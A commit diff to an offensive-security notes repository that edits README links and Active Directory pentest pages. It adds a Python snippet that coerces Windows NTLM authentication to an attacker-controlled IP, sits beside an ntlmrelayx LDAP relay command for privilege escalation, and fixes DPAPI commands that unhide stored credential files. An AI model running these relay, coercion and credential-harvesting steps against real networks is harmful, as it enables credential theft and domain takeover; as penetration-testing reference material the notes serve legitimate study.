[AHK] Automatic update 👽

README.md

@@ -14,10 +14,6 @@ While taking these notes, one main rule is that all the given techniques are act
 **DISCLAIMER.** All information contained in this blog is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published on the pages of this blog.
 {% endhint %}
 
-{% hint style="success" %}
-**SUPPORT.** Private pet projects of mine in offensive tooling are available [for my sponsors](https://boosty.to/snovvcrash).
-{% endhint %}
-
 {% hint style="info" %}
 **DEPRECATED.** The previous version of PPN is right [here](https://snovvcrash.rocks/PPN/).
 {% endhint %}
@@ -29,3 +25,5 @@ While taking these notes, one main rule is that all the given techniques are act
 {% embed url="https://github.com/snovvcrash" caption="GitHub" %}
 
 {% embed url="https://infosec.exchange/@snovvcrash" caption="Mastodon" %}
+
+{% embed url="https://t.me/OffensiveTwitter" caption="Offensive Twitter" %}

pentest/infrastructure/ad/acl-abuse.md

@@ -288,6 +288,18 @@ PS > IWR http://10.10.13.37 -UseDefaultCredentials
 $ ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
 ```
 
+Coerce auth [using Python](https://stackoverflow.com/a/35577331):
+
+```python
+import win32com.client
+URL = 'http://10.10.13.37/a'    
+COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
+COM_OBJ.SetAutoLogonPolicy(0)
+COM_OBJ.Open('GET', URL, False)
+COM_OBJ.Send()
+print(COM_OBJ.ResponseText)
+```
+
 Using Impacket **dacledit.py**:
 
 ```

pentest/infrastructure/ad/credential-harvesting/dpapi.md

@@ -25,7 +25,7 @@ PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappd
 Unhide files:
 
 ```
-PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff
+PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff"
 PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
 ```